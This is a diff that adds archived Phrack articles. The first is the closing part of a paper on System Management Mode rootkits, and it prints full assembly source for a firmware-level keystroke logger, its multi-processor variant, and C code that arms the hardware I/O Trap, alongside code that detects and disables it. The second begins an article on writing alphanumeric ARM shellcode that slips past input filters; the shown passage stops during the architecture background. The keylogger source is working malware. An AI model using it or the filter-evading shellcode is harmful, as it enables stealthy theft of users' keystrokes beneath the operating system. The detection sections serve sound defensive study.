+IO_TRAP_TRSR_REG	equ FED1DE00h ; Trap Status Register = RCBA + 1E00h
+IO_TRAP_TRCR_REG	equ FED1DE10h ; Trapped Cycle Register = RCBA + 1E10h
+
+KBRD_DATA_PORT		equ 60h
+
+DST_BUF_PHYSADDR	equ 20000h    ; any physical address read later
+SEG_4G			equ ?         ; depends on BIOS
+
+;
+; IO_SMI bit, I/O Port = 0x60
+; I/O Type = IN DX
+; I/O Length = 1
+; should all be checked separately
+;
+IOSMI_IN_60_BYTE	equ 00600013h
+
+;
+; SMM Save State Map fields
+;
+SMM_MAP_IO_STATE_INFO	equ FFA4h
+SMM_MAP_EAX		equ FFD0h
+
+;
+; we need to load DS with index of 4G 0-based data segment in GDT
+; to be able to access any MMIO
+; or physical addresses for logging scan codes
+;
+push ds
+push SEG_4G
+pop ds
+
+;
+; clear I/O Trap status bit
+;
+mov eax, IO_TRAP_TRSR_REG
+mov dword ptr [eax], 1
+
+;
+; check TRCR if it's IO read or write
+; we trap only reads here
+;
+mov eax, IO_TRAP_TRCR_REG
+mov ebx, dword ptr [eax]
+bswap ebx
+and bh, 0xf
+and bl, 0x1
+jz _smi_handled
+
+;
+; temporarily disable I/O Trap
+;
+mov eax, IO_TRAP_IOTR0_REG
+mov dword ptr [eax], 0
+
+;;;;;;;;;;; 
+; keystroke logging goes here
+;;;;;;;;;;; 
+
+pusha
+
+;
+; verify that this is IO_SMI due to read to 0x60 port
+;
+mov esi, SMBASE
+mov ecx, dword ptr [esi + SMM_MAP_IO_STATE_INFO]
+cmp ecx, IOSMI_IN_60_BYTE
+jnz _not_io_smi
+
+;
+; read scan code from keyboard controller port 0x60
+;
+xor ax, ax
+in al, KBRD_DATA_PORT
+
+;
+; log intercepted scan code (to LOG_BUFFER_PHYS_ADDR physical address)
+; the first dword is a number of scan code bytes saved in the buffer
+;
+mov edi, DST_BUF_PHYSADDR
+mov ecx, dword ptr [edi]
+push edi
+lea edi, dword ptr [edi + ecx + 4]
+mov byte ptr [edi], al
+
+;
+; increment number of scan code bytes saved in the buffer
+;
+inc ecx
+pop edi
+mov dword ptr [edi], ecx
+
+;
+; update EAX field in SMM state save map (SMBASE + 0x8000 + SMM_MAP_EAX)
+; with scan code to be returned as a result of trapped IN instruction
+;
+mov byte ptr [esi + SMM_MAP_EAX], al
+
+_not_io_smi:
+
+popa
+
+;;;;;;;;;;; 
+
+;
+; re-enable I/O Trap on read from port 0x60
+;
+mov eax, IO_TRAP_IOTR0_REG
+mov ebx, KBRD_DATA_PORT+1
+mov dword ptr [eax], ebx
+
+;
+; return 0 indicating that SMI was handled
+;
+_smi_handled:
+
+pop ds
+mov eax, 0
+retf
+
+
+Above listing intentionally lacks one detail needed for this SMI handler
+to function correctly in ASUS/AMI BIOS to prevent from copy-pasting it.
+A bit more debugging should be sufficient to figure it out.
+
+
+
+--[ 3.5 - Multi-processor keylogger specifics
+
+
+We've seen in the previous section that I/O Trap based SMM keylogger has
+to update saved EAX (RAX) register in SMM Save State Map so that the
+processor could return it as a result of trapped IN instruction.
+
+In case of multi processor system multiple logical processors may enter
+SMM at the same time so they need their own SMM Save State Map allocated
+in SMRAM. This is typically solved by setting SMRAM base address (SMBASE)
+to a different value for each processor by the BIOS firmware (this is
+referred to as "SMBASE relocation").
+
+For example, in dual processor system, one logical processor may have
+SMBASE = SMBASE0 and another processor may have SMBASE = SMBASE0 + 0x300.
+In this case, the first processor starts executing SMI handler code at
+EIP = SMBASE0 + 0x8000 and the second at EIP = SMBASE0 + 0x8000 + 0x300.
+SMM Save State Map areas for both processors will start at
+(SMBASE0 + 0x8000 + 0x7F00) and (SMBASE0 + 0x8000 + 0x7F00 + 0x300).
+
+The following simple diagram illustrates SMRAM layout for 2 processors:
+
++ Processor 0 ---------------------------+ Processor 1 ---------------------------+
+|                                        |                                        |
+|                                        + SMBASE + 0xFFFF + 0x300 ---------------+
+|                                        |///////// SMM Save Sate area ///////////|
+|                                        + SMBASE + 0xFF00 + 0x300 ---------------+
++ SMBASE + 0xFFFF -----------------------+                                        |
+|///////// SMM Save Sate area ///////////|                                        |
++ SMBASE + 0xFF00 -----------------------+                                        |
+|                                        |                                        |
+|                                        |                                        |
+|                                        |        SMI Handler entry point         |
+|                                        + SMBASE + 0x8000 + 0x300 ---------------+
+|                                        |                                        |
+|        SMI Handler entry point         |                                        |
++ SMBASE + 0x8000 -----------------------+                                        |
+|                                        |                                        |
+|                                        |                                        |
+|                                        |                                        |
+|                                        |               SMRAM start              |
++                                        + SMBASE + 0x300 ------------------------+
+|                                        |                                        |
+|               SMRAM start              |                                        |
++ SMBASE --------------------------------+----------------------------------------+
+
+
+Instead of 0x300, BIOS may choose any offset to use to increment SMBASE
+for all processors. There is an easy way to determine it. SMM Save State
+Map should contain SMM Revision Identifier Field at 0x7EFC offset of
+SMBASE+0x8000 which should have the same value for each processor that
+entered SMM. For example, SMM Revision ID may be 0x30100. SMI handler can
+search for the same value of SMM Revision ID in SMRAM. An address of the
+next SMM Revision ID field minus address of the current SMM Revision ID
+field gives the offset that should be added to SMBASE to calculate SMBASE
+of the next processor.
+
+Below we demonstrate how SMM keylogger handler provided in the previous
+section could have been modified to support dual processor. The code below
+checks if I/O State Field has value matching to the correct I/O Trap for
+each processor and, if so, updates EAX of this processor in SMM Save State
+Map:
+
+;
+; update saved EAX registers in SMM state save maps of 2 processors
+;
+mov esi, SMBASE
+lea ecx, dword ptr [esi + SMM_MAP_IO_STATE_INFO]
+cmp ecx, IOSMI_IN_60_BYTE
+jne _skip_proc0:
+mov byte ptr [esi + SMM_MAP_EAX], al
+
+_skip_proc0:
+lea ecx, dword ptr [esi + SMM_MAP_IO_STATE_INFO + 0x300]
+cmp ecx, IOSMI_IN_60_BYTE
+jne _skip_proc1:
+mov byte ptr [esi + SMM_MAP_EAX + 0x300], al
+
+_skip_proc1:
+..
+
+
+
+--[ 4 - SUGGESTED DETECTION METHODS
+
+
+
+--[ 4.1 - Detecting I/O Trap based SMM keylogger
+
+
+Generally, as pointed in previous research, Operating System does not have
+access to SMRAM as soon as it's locked by BIOS firmware. So detecting
+malicious code inside SMRAM becomes a challenging task for the OS or
+anti-virus software.
+
+In many cases, however, it is not necessary to inspect SMRAM to detect the
+presence of SMM rootkit. Let's explain this thesis on keylogger example
+described earlier.
+
+To be able to intercept pressed keystrokes SMM keystroke logger has to
+modify hardware configuration in a certain way. In case of using I/O Trap
+method SMM keylogger has to enable I/O Trap to trap on IN/OUT instructions
+to keyboard controller ports 0x60 and 0x64.
+
+In case of using I/O APIC technique SMM keylogger has to change I/O APIC
+Redirection Table to program SMI# as a delivery mode of hardware interrupt
+IRQ #01, as pointed in [smm_rkt].
+
+As usual we'll focus on I/O Trap based SMM keylogger. If there is no
+legitimate port 0x60/0x64 emulation used and I/O Trap is enabled to trap
+on keyboard ports then this is a clear indication of SMM keylogger. So to
+detect this keylogger we need to detect that I/O Trap has been programmed
+to trap on access to keyboard controller I/O ports 0x60 and 0x64.
+
+For example, the snippet below detects that I/O Trap is programmed to trap
+on reads from port 0x60:
+
+ pIOTR0_LO = (DWORD *)(rcba + RCBA_IOTR0_LO);
+
+ // keyboard controller port 0x60 + 1 enable I/O Trap
+ if(0x61 == (*(DWORD*)pIOTR0_LO)) {
+   DbgPrint("SMM keylogger detected.
+             Found enabled I/O Trap on keyboard port 60h\n");
+ }
+
+If I/O Trap is detected it's trivial to disable it. We simply need to
+write 0x0 to IOTR0 register.
+
+
+
+--[ 4.2 - General timing based detection
+
+
+Another possible method to detect I/O Trap based SMM keylogger is to
+measure timing difference between IN/OUT instructions that access keyboard
+controller ports vs. other I/O ports. As access to some or all keyboard
+ports is trapped by SMI handler then it will take (much) longer to return
+results of IN/OUT instructions. For example, profiling "IN 60h" could be:
+
+ RDTSC
+ IN AL, 60H
+ RDTSC
+
+It should be noted that all variants of IN instruction should be profiled
+like "IN AL, 60H", "IN AX, DX" etc., because I/O Trap may be programmed to
+intercept only certain variants.
+
+
+
+--[ 5 - CONCLUSION
+
+
+This work described details of how SMI handlers are implemented in BIOS
+system firmware and how to disassemble and modify them. The authors hope
+that this paper added some clarity to how malware could use SMI handlers
+to add rootkit functionality in SMM and, more importantly, how to detect
+such stealthy malware.
+
+It would be naive to assume that SMM is secure as long as BIOS firmware
+"locks down" SMM memory by setting D_LCK bit in SMRAMC register (original
+attack from [smm]). Other vulnerabilities already found in SMM protections
+as demonstrated in [xen_0wn].
+
+SMI handlers may also change from BIOS to BIOS, may be updated with the
+rest of BIOS firmware using BIOS update mechanism available for all
+motherboards, may be extended with lots of new features (even with new
+security features [xen_0wn]). Migration to (U)EFI will simplify EFI
+firmware development and may cause even more functionality to be added
+to EFI SMI handlers in SMM. Additionally, SMI handlers should interact
+with unprotected OS and drivers. The bottom line is that we believe the
+main danger will come from software vulnerabilities in SMI handlers' code
+similarly to vulnerabilities in OS kernel, drivers and applications. BIOS
+vendors should start paying better attention to what they are putting
+into the SMM.
+
+
+
+--[ 6 - SOURCE CODE
+
+
+--[ 6.1 - System Management Mode keylogger that uses I/O Trap mechanism
+
+
+;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
+;;
+;; I/O Trap based SMI keystroke logger
+;;
+;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
+
+;
+; I/O Trap registers in Root Complex Base Address (RCBA)
+;
+IO_TRAP_IOTR0_REG	equ FED1DE80h ; I/O Trap Register 0 = RCBA + 1E80h
+IO_TRAP_TRSR_REG	equ FED1DE00h ; Trap Status Register = RCBA + 1E00h
+IO_TRAP_TRCR_REG	equ FED1DE10h ; Trapped Cycle Register = RCBA + 1E10h
+
+KBRD_DATA_PORT          equ 60h
+
+DST_BUF_PHYSADDR        equ 20000h    ; any physical address read later
+SEG_4G			equ ?         ; depends on BIOS
+
+;
+; IO_SMI bit, I/O Port = 0x60
+; I/O Type = IN DX
+; I/O Length = 1
+; should all be checked separately
+;
+IOSMI_IN_60_BYTE       equ 00600013h
+
+;
+; SMM Save State Map fields
+;
+SMM_MAP_IO_STATE_INFO  equ FFA4h
+SMM_MAP_EAX            equ FFD0h
+
+;
+; we need to load DS with index of 4G 0-based data segment in GDT
+; to be able to access any MMIO
+; or physical addresses for logging scan codes
+;
+push ds
+push SEG_4G
+pop ds
+
+;
+; clear I/O Trap status bit
+;
+mov eax, IO_TRAP_TRSR_REG
+mov dword ptr [eax], 1
+
+;
+; check TRCR if it's IO read or write
+; we trap only reads here
+;
+mov eax, IO_TRAP_TRCR_REG
+mov ebx, dword ptr [eax]
+bswap ebx
+and bh, 0xf
+and bl, 0x1
+jz _smi_handled
+
+;
+; temporarily disable I/O Trap
+;
+mov eax, IO_TRAP_IOTR0_REG
+mov dword ptr [eax], 0
+
+;;;;;;;;;;; 
+; keystroke logging goes here
+;;;;;;;;;;; 
+
+pusha
+
+;
+; verify that this is IO_SMI due to read to 0x60 port
+;
+mov esi, SMBASE
+mov ecx, dword ptr [esi + SMM_MAP_IO_STATE_INFO]
+cmp ecx, IOSMI_IN_60_BYTE
+jnz _not_io_smi
+
+;
+; read scan code from keyboard controller port 0x60
+;
+xor ax, ax
+in al, KBRD_DATA_PORT
+
+;
+; log intercepted scan code (to LOG_BUFFER_PHYS_ADDR physical address)
+; the first dword is a number of scan code bytes saved in the buffer
+;
+mov edi, DST_BUF_PHYSADDR
+mov ecx, dword ptr [edi]
+push edi
+lea edi, dword ptr [edi + ecx + 4]
+mov byte ptr [edi], al
+
+;
+; increment number of scan code bytes saved in the buffer
+;
+inc ecx
+pop edi
+mov dword ptr [edi], ecx
+
+;
+; update EAX field in SMM state save map (SMBASE + 0x8000 + SMM_MAP_EAX)
+; with scan code to be returned as a result of trapped IN instruction
+;
+mov byte ptr [esi + SMM_MAP_EAX], al
+
+_not_io_smi:
+
+popa
+
+;;;;;;;;;;; 
+
+;
+; re-enable I/O Trap on read from port 0x60
+;
+mov eax, IO_TRAP_IOTR0_REG
+mov ebx, KBRD_DATA_PORT+1
+mov dword ptr [eax], ebx
+
+;
+; return 0 indicating that SMI was handled
+;
+_smi_handled:
+
+pop ds
+mov eax, 0
+retf
+
+
+
+--[ 6.2 - Programming I/O Trap
+
+
+#define LPC_RCBA_REG	0xF0
+
+#define RCBA_IOTR0_LO	0x1E80 // I/O Trap 0 Register (IOTR0) low dword
+#define RCBA_IOTR0_HI	0x1E84 // I/O Trap 0 Register (IOTR0) high dword
+
+#define pci_addr(bus,dev,fn,reg) \
+          (0x80000000 |          \
+          ((bus & 0xff) << 16) | \
+          ((dev & 0x1f) << 11) | \
+          ((fn & 7) << 8) |      \
+          (reg & 0xfc))
+
+void _set_keystroke_io_trap()
+{
+   unsigned long lpc_rcba_addr;
+   unsigned long rcba_reg;
+   void *rcba;
+
+   DWORD * pIOTR0_LO;
+   DWORD * pIOTR0_HI;
+
+   //
+   // Read the Root Complex Base Address Register (RCBA)
+   //
+
+   // LPC device in ICH, B:D:F: = 0:31:0
+   lpc_rcba_addr = pci_addr(0, 31, 0, LPC_RCBA_REG);
+
+   _outpd(0xcf8, lpc_rcba_addr);
+   rcba_reg = _inpd(0xcfc);
+   pa.LowPart = rcba_reg & 0xffffc000;
+   DbgPrint("RCBA base physical address: 0x%08x\n", pa.LowPart);
+
+   // 0x2000 is enough to access I/O Trap range
+   rcba = MmMapIoSpace(pa, 0x2000, MmCached);
+
+   //
+   // Program I/O Trap to trap on every read from
+   // keyboard controller data port 0x60
+   //
+
+   pIOTR0_LO = (DWORD *)(rcba + RCBA_IOTR0_LO);
+   pIOTR0_HI = (DWORD *)(rcba + RCBA_IOTR0_HI);
+
+   // trap on port read + all byte enables
+   *(DWORD*)pIOTR0_HI = 0x100f0;
+   // keyboard controller port 0x60 + 1 enable I/O Trap
+   *(DWORD*)pIOTR0_LO = 0x61;
+   DbgPrint("IOTR0 = 0x%08x%08x at 0x%08x\n",
+            *pIOTR0_HI, *pIOTR0_LO, (pa.LowPart + RCBA_IOTR0_LO));
+
+}
+
+
+
+--[ 6.3 - Detecting I/O Trap SMI keystroke logger
+
+
+void _detect_keystroke_io_trap()
+{
+   unsigned long lpc_rcba_addr;
+   unsigned long rcba_reg;
+   void *rcba;
+
+   DWORD * pIOTR0_LO;
+   DWORD * pIOTR0_HI;
+
+   //
+   // Read the Root Complex Base Address Register (RCBA)
+   //
+
+   // LPC device in ICH, B:D:F: = 0:31:0
+   lpc_rcba_addr = pci_addr(0, 31, 0, LPC_RCBA_REG);
+
+   _outpd(0xcf8, lpc_rcba_addr);
+   rcba_reg = _inpd(0xcfc);
+   pa.LowPart = rcba_reg & 0xffffc000;
+
+   // 0x2000 is enough to access I/O Trap range
+   rcba = MmMapIoSpace(pa, 0x2000, MmCached);
+
+   pIOTR0_LO = (DWORD *)(rcba + RCBA_IOTR0_LO);
+   pIOTR0_HI = (DWORD *)(rcba + RCBA_IOTR0_HI);
+
+   // keyboard controller port 0x60 + 1 enable I/O Trap
+   if(0x61 == (*(DWORD*)pIOTR0_LO))
+   {
+     DbgPrint("SMM keylogger detected.
+               Found enabled I/O Trap on keyboard data port 60h\n");
+     // Disable I/O Trap SMM keylogger
+     // clear low dword of IOTRn register
+     *(DWORD*)pIOTR0_LO = 0;
+   }
+}
+
+
+--[ 7 - REFERENCES
+
+
+[smm_rkt]	A New Breed of Rootkit: The System Management Mode (SMM) Rootkit
+		Shawn Embleton, Sherri Sparks, Cliff Zou. Black Hat USA 2008
+		http://www.eecs.ucf.edu/~czou/research/SMM-Rootkits-Securecom08.pdf
+                http://www.tucancunix.net/ceh/bhusa/BHUSA08/speakers/Embleton_Sparks_SMM_Rookits/
+                BH_US_08_Embleton_Sparks_SMM_Rootkits_WhitePaper.pdf 
+ 
+
+[smm]		Using CPU System Management Mode to Circumvent Operating System Security Functions.
+		Loic Duflot, Daniel Etiemble, Olivier Grumelard. CanSecWest 2006
+		http://www.ssi.gouv.fr/fr/sciences/fichiers/lti/cansecwest2006-duflot-paper.pdf
+
+[phrack_smm]	Using SMM for 'Other Purposes'.
+		BSDaemon, coideloko, and D0nand0n. Phrack Vol 0x0C, Issue 0x41
+		http://www.phrack.org/issues.html?issue=65
+
+[efi_hack]	Hacking the Extensible Firmware Interface Firmware Interface
+		John Heasman. Black Hat USA 2007
+		http://www.ngssoftware.com/research/papers/BH-VEGAS-07-Heasman.pdf
+
+[ich]		Intel I/O Controller Hub 10 (ICH10) Family Datasheet
+		http://www.intel.com/assets/pdf/datasheet/319973.pdf
+
+[intel_man]	Intel IA-32 Architecture Software Developer's Manual
+		http://www.intel.com/products/processor/manuals/
+
+[amd_man]	BIOS and Kernel's Developer's Guide for AMD Athlon 64 and AMD Opteron Processors
+		Advanced Micro Devices, Inc.
+		http://www.amd.com/us-en/assets/content_type/white_papers_and_tech_docs/26094.PDF
+
+[bios_disasm]	BIOS Disassembly Ninjutsu Uncovered or
+		Pinczakko's Guide to Award BIOS Reverse Engineering
+		Darmawan M Salihun aka Pinczakko
+		http://www.geocities.com/mamanzip/Articles/Award_Bios_RE/Award_Bios_RE_guide.html
+		http://www.geocities.com/mamanzip/Articles/award_bios_patching/award_bios_patching.html
+
+[ami_mod]	Performing AMI BIOS Mods Discussion Thread // The Rebels Heaven
+		http://www.rebelshavenforum.com/sis-bin/ultimatebb.cgi?ubb=get_topic&f=52&t=000049
+
+[xen_0wn]	Preventing and Detecting Xen Hypervisor Subversions
+		Joanna Rutkowska & Rafal Wojtczuk. Black Hat USA 2008
+		http://invisiblethingslab.com/bh08/part2-full.pdf
+
+[ami_usb]	USB Support for AMIBIOS8
+		American Megatrends, Inc.
+		http://www.securitytechnet.com/resource/hot-topic/homenet/AMIBIOS8_USB_Whitepaper.pdf
+
+[smm_cache]	Getting into SMRAM: SMM Reloaded
+		Loic Duflot et al. CanSecWest 2009
+		http://cansecwest.com/csw09/csw09-duflot.pdf
+
+		Attacking SMM Memory via IntelR CPU Cache Poisoning
+		Rafal Wojtczuk and Joanna Rutkowska
+		http://invisiblethingslab.com/resources/misc09/smm_cache_fun.pdf
+
+--------[ EOF
diff --git a/phrack66/12.txt b/phrack66/12.txt
new file mode 100644
index 0000000..b2c6762
--- /dev/null
+++ b/phrack66/12.txt
@@ -0,0 +1,2030 @@
+|=-------------------------------------------------------------------=|
+|=-----------------=[ Alphanumeric RISC ARM Shellcode ]=-------------=|
+|=-------------------------------------------------------------------=|
+|=-------------------------------------------------------------------=|
+|=--=[ Yves Younan (yyounan@fort-knox.org) / ace (ace@nologin.org]=--=|
+|=----------=[ Pieter Philippaerts (pieter@mentalis.org) ]=----------=|
+|=-------------------------------------------------------------------=|
+
+
+     0.- Introduction
+    
+     1.- The ARM architecture
+        1.0 - The ARM Processor
+        1.1 - Coprocessors
+        1.2 - Addressing Modes
+        1.3 - Conditional Execution
+        1.4 - Example Instructions
+        1.5 - The Thumb Instruction Set
+                
+     2.- Alphanumeric shellcode
+        2.0 - Alphanumeric bit patterns
+        2.1 - Addressing modes
+        2.2 - Conditional Execution
+        2.3 - The Instruction List
+        2.4 - Getting a known value in a register 
+        2.5 - Writing to R0-R2
+        2.6 - Self-modifying Code
+        2.7 - The Instruction Cache
+        2.8 - Going to Thumb Mode
+	2.9 - Going to ARM mode
+        
+     3.- Conclusion
+
+     4.- Acknowledgements
+
+     5.- References
+
+     A.- Shellcode Appendix
+        A.0 - Writable Memory
+        A.1 - Example Shellcode
+        A.2 - Resulting Bytes
+
+
+
+--[ 0.- Introduction
+
+With the sudden explosion of mobile devices, the ARM processor has
+become one of the most widespread CPU cores in the world. ARM
+processors offer a good trade-off between power usage and
+processing power, which makes it an excellent candidate for mobile
+and embedded devices. Most mobile phones and personal digital
+assistants feature an ARM processor.
+
+Only recently, however, these devices have become powerful enough
+to let users connect over the internet to various services, and to
+share information like we are used to on desktop PCs. Unfortunately,
+this introduces a number of security risks.
+
+Like PCs, native ARM applications are susceptible to attacks such
+as buffer overflows and other improper input validation abuse. Since
+up till recently only fully featured desktop computers were powerful
+enough to connect to the internet and disseminate information in a
+ubiquitous manner, most attacks have focussed on the dominant desktop
+processor, which is the x86 processor.
+
+Given the increased connectivity of ARM-based devices, and given the
+potential for misuse of these devices (for instance, by making a
+hacked phone call commercial numbers), attacks on these devices will
+become much more common than is now the case.
+
+A typical hurdle for exploit writers, is that the shellcode has to
+pass one or more filtering methods before reaching the vulnerable
+buffer. A filtering method is a method that does some simple input
+validation, for instance by stringently checking that input matches
+a particular predefined pattern. A popular regular expression for
+example is [a-zA-Z0-9] (possibly extended with "space"). Intrusion
+detection systems are also adding more checks to detect particular
+patterns of op codes to detect attacks against applications.
+
+For educational purposes, we describe in this article how to write
+alphanumeric shellcode for ARM. This is important, because alphanumeric
+strings typically pass more of these validation checks and tend to
+survive more data transformations (such as conversions from one
+encoding to another) than non-alphanumeric shellcode. Writing
+alphanumeric shellcode was not considered easily doable on RISC
+architectures, which use 4 byte instructions. 
+
+When we discuss the bits in a byte we will use the following
+representation: the most significant bit is bit 7 and the least
+significant bit is bit 0 in our discussion. The first byte of an
+instruction is bit 31 to 24 and the last byte is bit 7 to 0.
+
+
+
+--[ 1.- The ARM architecture
+
+
+----[ 1.0 The ARM Processor
+
+The ARM architecture is a 32-bit RISC architecture with 16 general
+purpose registers available to regular programs and a status
+register (actually there are more general purpose registers and
+status registers but those are only used in exception modes and not
+important for our discussion). Every instruction is 4 bytes long so
+we must ensure that all 4 of these bytes are alphanumeric. This is
+very different from the x86 architecture which has variable length
+instructions. As a result, getting instructions to be completely
+alphanumeric is harder on ARM than on x86.
+
+Registers R0 to R12 are real general purpose registers that do not
+have a dedicated purpose. Register R13 is used as a stack pointer
+and can also be referred to as register SP. Register R14 is used as
+the link register and is also referred to as LR. It contains the
+return address for functions and exceptions. Register R15 contains
+the current program counter and is also referred to as PC. Unlike
+x86 architectures, we can directly read and write this register.
+Reading from this register will return the currently executing
+instruction + 8 bytes in ARM mode or the current instruction + 4
+bytes in Thumb mode (see section 1.5). Writing to this register
+causes execution to continue at this address.
+
+                 A[31:0]
+     _________      /\       _________
+     | _____ | ALE  ||   ABE |_____  |
+     | |    ||  |   ||    |  ||    | |
+     | |    \/  V   ||    V  \/    |i|
+     | |  +--------------------+   |n|
+     | |  |  Address Register  |   |c|
+     | |  +--------------------+   |r|
+     | |        ^        ||        |e|
+     | |       / \       ||        |m|
+     | |       |P|       \/        |e|
+     | |       |C|  +-----------+  |n|
+     | |____   | |  |  Address  |__|t|
+     | ____ |  |b|  |Incrementer|__ e|    +-----------+
+     | |   ||  |u|  +-----------+  |r|    |   Scan    |
+     | |   \/  |s|                 | |    |  Control  |
+     | | +---------------------+   |b|    +-----------+
+     | | |    Register Bank    |   |u|    +-----------+<- DBGRQI
+     | | |(31x32-bit registers)|   |s|    |           |<- BREAKPTI
+     | | | (6 status registers)|<----+    |           |-> DBGACK
+     | | +---------------------+          |           |-> ECLK
+     |A|     | |        |                 |           |-> nEXEC
+     |L|     | |        |         ___     |           |<- ISYNC
+     |U|     | |        +-------->| |     |           |<- BL[3:0]
+     | |     | |   +----------+   |B|     |           |<- APE
+     |b|     | |   |   32x8   |   | |     |           |<- MCLK
+     |u|     |A|<=>|Multiplier|<=>|b|     |           |<- nWAIT
+     |s|     | |   +----------+   |u|     |           |-> nRW
+     | |     |b|       ___________|s|     |Instruction|-> MAS[1:0]
+     | |     |u|       | _________  |     |  Decoder  |<- nIRQ
+     | |     |s|       ||         | |     |     &     |<- nFIQ
+     | |     | |       \/         | |     |  Control  |<- nRESET
+     | |     | |   +-------+      | |     |   Logic   |<- ABORT
+     | |     | |   |Barrel |      | |     |           |-> nTRANS
+     | |     | |   |Shifter|      | |     |           |-> nMREQ
+     | |     | |   +-------+      | |     |           |-> nOPC
+     | |     \ /      ||          | |     |           |-> SEQ
+     | |      v       \/          | |     |           |-> LOCK
+     | |     ------------         | |     |           |-> nCPI
+     | |     \32-bit ALU/         | |     |           |<- CPA
+     | |      ----------          | |     |           |<- CPB
+     | |__________||              | |     |           |-> nM[4:0]
+     |_____________|              | |     |           |<- TBE
+             _____________________| |     |           |-> TBIT
+             |______________________|     +-----------+-> HIGHZ
+             ||                 /\              /\
+             \/                 ||              ||
+     +-------------------+  +---------------------------+
+     |Write Data Register|  |   Instruction pipeline    |
+     +-------------------+  |   & Read Data Register    |
+       |  ^  ^     ||       |& Thumb Instruction Decoder|
+       v  |  |     ||       +---------------------------+
+    nENOUT|nENIN   ||                    /\
+          |        ||____________________||
+         DBE       |______________________|
+                             ||
+                             \/
+                          D[31:0]
+
+There are many versions of the ARM processor, with version 6 adding
+a large amount of new instructions. In this paper we try to remain
+as broad as possible: our alphanumeric ARM shellcode should work on
+all versions of the ARM processor. To this end, we will drop all
+instructions that require a specific version of a processor.
+However, we clearly note which instructions are dropped because they
+are not alphanumeric and which instructions are dropped because of
+compatibility constraints. This allows a shellcode writer who only
+needs compatibility with a specific processor version to take
+advantage of the extra instructions that may be available in that
+processor.
+
+
+----[ 1.1 Coprocessors
+
+ARM processors can be extended with a number of coprocessors to
+perform non-standard calculations and to avoid having to do these
+calculations in software. ARM supports up to 16 coprocessors, each
+of which has a unique identification number. Some processors might
+need more than one identification number, in order to accommodate
+large instruction sets. Coprocessors are available for memory
+management, floating point operations, debugging, media,
+cryptography, ...
+
+When an ARM processor encounters an instruction it cannot process,
+it sends the instruction out on the coprocessor bus. If a
+coprocessor recognizes the instruction, it can execute it and
+respond to the main processor. If none of the coprocessors respond,
+an 'illegal instruction' exception is raised.
+
+
+----[ 1.2 Addressing Modes
+
+ARM has different addressing modes. We'll briefly discuss the
+different addressing modes which are useful for writing our
+shellcode.
+
+----[ 1.2.0 Addressing modes for data processing
+
+Most instructions will look like this:
+    <opcode>{<cond>}{S} <Rd>, <Rn>, <shifter_operand>
+For example:
+    ADDEQ r0, r1, #20
+
+The shifter_operand is the third argument to an instruction. It
+is 12 bits large and can be one of the following 11 possibilities.
+When a <shift_imm> is specified below, this is an immediate that
+is 4 bits large, meaning that it can be any value in the range of 0
+to 31.
+
+1. #immediate   An immediate of 8 bits can be used as shifter
+operand. The 8 bits immediate can optionally be rotated right by a
+shift_imm.
+2. <Rm>   A register can be used as an argument.
+3. <Rm>, LSL #<shift_imm>   A register, which is logically shifted
+left a shift_imm.
+4. <Rm>, LSL <Rs>   A register Rm is used as argument that is shifted
+left by a second register Rs.
+5. <Rm>, LSR #<shift_imm>   A register, which is logically shifted
+right by a shift_imm.
+6. <Rm>, LSR <Rs>   A register Rm is used as argument that is shifted
+right by a second register Rs.
+7. <Rm>, ASR #<shift_imm>   A register, which is arithmetically
+shifted right by a shift_imm.
+8. <Rm>, ASR <Rs>   A register, which is arithmetically shifted right
+by a register.
+9. <Rm>, ROR #<shift_imm>   A register, which is rotated right by a
+shift_imm.
+10. <Rm>, ROR <Rs>   A register, which is rotated right by a register.
+11. <Rm>, RRX   A register which is rotated right by one bit, with the
+carry flag replacing the free bit. The carry flag is then replaced
+with the bit which was rotated out.
+
+----[ 1.2.1 Addressing modes for load/store word or unsigned byte
+
+This is the general syntax for a load or store instruction:
+    LDR{<cond>}{B}{T} <Rd>, addressing_mode
+For example:
+    LDRPLB r3, [r3, #-48]
+
+Where addressing_mode is one of the following 6 possibilities. For
+the loads and stores with translation (e.g. LDRBT), only the last 3
+addressing modes are possible. If an exclamation mark is specified
+at the end of the first 3 addressing modes (e.g. for addressing
+mode 1, [<Rn>, #+/-<imm_12>]!), then the calculated address is
+written back to Rn.
+
+1. [<Rn>, #+/-<imm_12>]<!>   Rn is the base address of the memory
+location where Rd will be stored. Optionally a 12 bit immediate can
+be used as offset. This offset is then added to the base address to
+calculate the address to write to.
+2. [<Rn>, +/-<Rm]<!>   Rn is the base address of the memory location
+where Rd will be stored and Rm will be used as offset for Rn.
+3. [<Rn>, +/-<Rm>, <shift> #<shift_imm>]<!>   Rn is the base address,
+with Rm as offset. The Rm register is shifted by applying the <shift>
+operation with a <shift_imm> as argument. <shift> is one of LSL, LSR,
+ASR, ROR or RRX.
+
+The following three addressing modes are essentially the same as the
+above 3 addressing modes, except that they are post-indexed. That
+means that Rn is used as the memory location for the load or store.
+The calculation is done afterwards and written back into Rn.
+
+4. [<Rn>], #+/-<imm_12>
+5. [<Rn>], +/-<Rm>
+6. [<Rn>], +/-<Rm>, <shift> #<shift_imm>
+
+----[ 1.2.2 Addressing modes for load/store multiple
+
+The general instruction syntax for multiple loads and stores looks
+like this:
+    LDM{<cond>}<addressing_mode> <Rn>{!}, <registers>{^}
+For example:
+    LDMPLFA r5!, {r0, r1, r2, r6, r8, lr}
+
+Addressing modes are one of the following 4 possibilities:
+
+1. IA - Increment after In this addressing mode, Rn will be used as
+a base address and the first memory location to read or write from.
+The subsequent addresses will be calculated by incrementing the
+previous address with 4.
+2. IB - Increment before In this addressing mode, Rn will be used as
+the base address. The first memory location to read or write from is
+the base address + 4. Subsequent addresses will also be calculated
+by incrementing the previous address with 4.
+3. DA - Decrement after Rn is used as the base address, from that
+register, the amount of registers multiplied by 4 is subtracted from
+this base address. Then 4 is added to this address. This is used as
+the first memory location to read or write from. Subsequent
+addresses are calculated by incrementing the previous address
+with 4.
+4. DB - Decrement before Rn is used as the base address, from that
+register, the amount of registers multiplied by 4 is subtracted from
+this base address. This is used as the first memory location to read
+or write from. Subsequent addresses are calculated by incrementing
+the previous address with 4.
+
+
+----[ 1.3 Conditional Execution
+
+One of the features of the ARM processor is that it supports
+conditional execution of instructions. This means that the
+programmer can choose whether instructions will be executed or not,
+depending on the value of one of the different status flags. This
+has practical use to write, for instance, short if structures in a
+more compact manner. Almost all ARM instructions support conditional
+execution.
+
